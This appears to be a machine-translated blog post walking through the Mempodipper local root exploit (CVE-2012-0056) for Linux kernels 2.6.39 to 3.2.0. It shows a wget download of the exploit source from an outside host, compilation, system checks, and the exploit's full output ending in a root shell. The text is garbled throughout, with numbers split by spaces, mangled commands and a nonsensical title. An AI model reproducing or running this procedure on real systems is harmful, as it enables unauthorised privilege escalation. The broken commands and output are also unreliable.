Linux 2.6.39 to 3.2.0 explosion mention the right vulnerability-vulnerability warning-the black bar safety net

1. Download the exploit file

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2. Compile

gcc mempodipper. c-o mempodipper

3. Before executing the view

netcat@netcat:~$ uname-r

3.0.0-1 2-generic

netcat@netcat:~$ cat /etc/issue

Ubuntu 11.10 n l

netcat@netcat:~$ uname-a

Linux netcat 3.0.0-1 2-generic #2 0-Ubuntu SMP Fri Oct 7 1 4:5 0:4 2 UTC 2 0 1 1 i686 i686 i386 GNU/Linux

netcat@netcat:~$ id

uid=1 0 0 0(netcat) gid=1 0 0 0(netcat) Group=1 0 0 0(netcat),4(adm),2 0(dialout),2 4(cdrom),4 6(plugdev),1 1 6(lpadmin),1 1 8(admin),1 2 4(sambashare)

4. Perform

netcat@netcat:~$ ./ mempodipper

===============================

= Mempodipper =

= by zx2c4 =

= Jan 2 1, 2 0 1 2 =

===============================

[+] Ptracing su to find next instruction without reading binary.

[+] Creating ptrace pipe.

[+] Forking ptrace child.

[+] Waiting for ptraced child to give output on syscalls.

[+] Ptrace_traceme’ing process.

[+] Error message written. Single stepping to find address.

[+] Resolved call address to 0×8 0 4 9 5 7 0.

[+] Opening socketpair.

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/3 0 1 2/mem in child.

[+] Sending fd 6 to parent.

[+] Received fd at 6.

[+] Assigning fd 6 to stderr.

[+] Calculating su padding.

[+] Seeking to offset 0×8 0 4 9 5 6 4.

[+] Executing su with shellcode.

sh-4.2#

From http://www.4shell.org/archives/2149.html

The effect of the self-test it!